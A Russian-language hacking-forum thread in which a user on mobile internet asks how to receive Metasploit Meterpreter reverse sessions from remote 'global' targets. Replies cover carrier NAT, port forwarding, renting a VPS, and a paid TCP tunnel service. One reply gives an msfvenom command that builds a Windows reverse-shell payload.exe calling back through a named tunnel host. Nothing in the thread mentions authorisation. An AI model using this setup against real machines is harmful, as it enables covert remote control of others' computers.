• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Приглашаем на KubanCTF

    Старт соревнований 14 сентября в 10:00 по москве

    Ссылка на регистрацию в соревнованиях Kuban CTF: kubanctf.ru

    Кодебай является технологическим партнером мероприятия

Проблемы с захватом обратного соединения в Metasploit Meterpreter при использовании мобильного интернета

venboy7

Member
18.07.2022
9
0
BIT
24
Приветствую! Уже несколько лет пытаюсь решить проблему с захватом обратного соединения в Metasploit Meterpreter на Kali Linux. Мой ноутбук подключен к интернету через точку доступа от телефона (обычная SIM-карта мобильного оператора). Пробовал множество методов, включая использование Ngrok, VPN, открытие портов, но ни один из них не помог достичь желаемого результата.
Основная задача — ловить цели с глобального IP и удалённо. Может, кто-то сталкивался с подобной ситуацией? Буду благодарен за любые советы или проверенные методы, которые работают в моем случае. Если у вас есть подробные инструкции по настройке, буду рад ознакомиться и попробовать их на практике.
 

N1GGA

Codeby Team
Администратор
16.07.2018
351
343
BIT
375
Привет! Скорее всего, порты для входящих соединений закрыты, поэтому сессия не может достучаться до твоего msf листенера.
 

mcfly

Green Team
08.09.2016
640
629
BIT
391
Привет! Зачем тебе ngrock если ты в локальной сети твой ноутбук подключен к интернету через точку доступа от телефона? Пробуй отключить брандмауэр виндовый (defender) и должна прилететь сессия!
 

venboy7

Member
18.07.2022
9
0
BIT
24
Я открыл порты на ноутбуке и полностью отключил брандмауэр. Можете, пожалуйста, привести пример атаки на глобальную цель в моем случае?

Привет! Скорее всего, порты для входящих соединений закрыты, поэтому сессия не может достучаться до твоего msf листенера.
Спасибо за ответ, в свободное время прошу дальше уточнить мой вопрос ниже.

Привет! Зачем тебе ngrock если ты в локальной сети твой ноутбук подключен к интернету через точку доступа от телефона? Пробуй отключить брандмауэр виндовый (defender) и должна прилететь сессия!
да, подключён через точку доступа, но у меня же нету глобального ip, как же тогда словить сессию от target'a😕

Спасибо за ответ, в свободное время прошу дальше уточнить мой вопрос ниже.
 

f22

Codeby Academy
Gold Team
05.05.2019
1 891
226
BIT
1 447
да, подключён через точку доступа
А перенаправление портов вы на этой точке доступа настраивали?

но у меня же нету глобального ip, как же тогда словить сессию от target'a
Самый простой способ (если не брать тот же неработающий ngrok) - арендовать VPS или выделенный сервер и настроить подключение через него. У таких серверов чаще всего сразу выдаётся белый IP, ну а систему обычно можно поставить любую
 

mcfly

Green Team
08.09.2016
640
629
BIT
391
Я открыл порты на ноутбуке и полностью отключил брандмауэр. Можете, пожалуйста, привести пример атаки на глобальную цель в моем случае?


Спасибо за ответ, в свободное время прошу дальше уточнить мой вопрос ниже.


да, подключён через точку доступа, но у меня же нету глобального ip, как же тогда словить сессию от target'a😕

Спасибо за ответ, в свободное время прошу дальше уточнить мой вопрос ниже.
Нашел замену ngroka руский сервис делает тунели tcp подписка на месяц 299р

  • Туннельная нода в России, задержка радует
  • Клиент похож на ngrok, статичный бинарник, можно запускать как агента в фоне
  • Есть работа с заголовками, авторизация и прочие фишки
  • Есть инспектор запросов
  • Есть TCP тунннели
  • Приятная документация
  • Цена, всего 299 рублей в месяц
Запустил вроде пашет metasploit не тестил!

4.PNG
 

venboy7

Member
18.07.2022
9
0
BIT
24
Нашел замену ngroka руский сервис делает тунели tcp подписка на месяц 299р

  • Туннельная нода в России, задержка радует
  • Клиент похож на ngrok, статичный бинарник, можно запускать как агента в фоне
  • Есть работа с заголовками, авторизация и прочие фишки
  • Есть инспектор запросов
  • Есть TCP тунннели
  • Приятная документация
  • Цена, всего 299 рублей в месяц
Запустил вроде пашет metasploit не тестил!

Посмотреть вложение 76449
Спасибо за совет! Я так понимаю условно в LHOST я пишу 127.0.0.1, а LPORT 4444?

А перенаправление портов вы на этой точке доступа настраивали?


Самый простой способ (если не брать тот же неработающий ngrok) - арендовать VPS или выделенный сервер и настроить подключение через него. У таких серверов чаще всего сразу выдаётся белый IP, ну а систему обычно можно поставить любую
Спасибо за ответ! Но как сделать перенаправление портов на этой точке, если у меня интернет идёт от телефона, а в нем просто сим карта(но скорее всего я вас не понимаю, можете объяснить по подробнее в свободное время? )

А перенаправление портов вы на этой точке доступа настраивали?


Самый простой способ (если не брать тот же неработающий ngrok) - арендовать VPS или выделенный сервер и настроить подключение через него. У таких серверов чаще всего сразу выдаётся белый IP, ну а систему обычно можно поставить любую
можете подсказать vps для моих целей? (не из самых дорогих, по возможности)
 

mcfly

Green Team
08.09.2016
640
629
BIT
391
Спасибо за совет! Я так понимаю условно в LHOST я пишу 127.0.0.1, а LPORT 4444?
да все верно в multi/handler в LHOST я пишу 127.0.0.1, а LPORT 4444 ! а в msfvenom -p windows / meterpreter / reverse_tcp LHOST = ru.tuna.am LPORT = 20487 -f exe> payload.exe
 
Последнее редактирование:

f22

Codeby Academy
Gold Team
05.05.2019
1 891
226
BIT
1 447
можете подсказать vps для моих целей? (не из самых дорогих, по возможности)
Погуглите сравнение vps или поиск vps - есть много разных вариантов и по ценам, и по странам, и по возможностям. Для ваших целей подойдёт самый простой и дешёвый - главное, чтобы белый IP был.

Но как сделать перенаправление портов на этой точке
Если аппарат не рутованый и у вас серый IP, то никак(
Вы поймите, ваш телефон работает как роутер и номинально все запросы из внешней сети приходят на него, а уже он перенаправляет их в ваш ноутбук (это очень примитивная схема), если не пробрасывать порты, то все эти пакеты из внешней сети так и будет принимать телефон и не будет передавать их дальше в сеть.
Я так понимаю условно в LHOST я пишу 127.0.0.1, а LPORT 4444?
Откуда телефон/роутер узнает, что он должен передать пакет на порт 4444 именно на ваш ноут, а не просто отбросить его? Внутри сети у вас всё будет работать, а вот чтобы работало вне, нужно производить более тонкую настройку - поднимать сервер на VPS, там запускать листенер и либо прямо там слушать подключение, либо подключаться к нему со своей локальной машины
 

venboy7

Member
18.07.2022
9
0
BIT
24
Погуглите сравнение vps или поиск vps - есть много разных вариантов и по ценам, и по странам, и по возможностям. Для ваших целей подойдёт самый простой и дешёвый - главное, чтобы белый IP был.


Если аппарат не рутованый и у вас серый IP, то никак(
Вы поймите, ваш телефон работает как роутер и номинально все запросы из внешней сети приходят на него, а уже он перенаправляет их в ваш ноутбук (это очень примитивная схема), если не пробрасывать порты, то все эти пакеты из внешней сети так и будет принимать телефон и не будет передавать их дальше в сеть.

Откуда телефон/роутер узнает, что он должен передать пакет на порт 4444 именно на ваш ноут, а не просто отбросить его? Внутри сети у вас всё будет работать, а вот чтобы работало вне, нужно производить более тонкую настройку - поднимать сервер на VPS, там запускать листенер и либо прямо там слушать подключение, либо подключаться к нему со своей локальной машины
Спасибо Вам за ответ! придётся искать vps
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!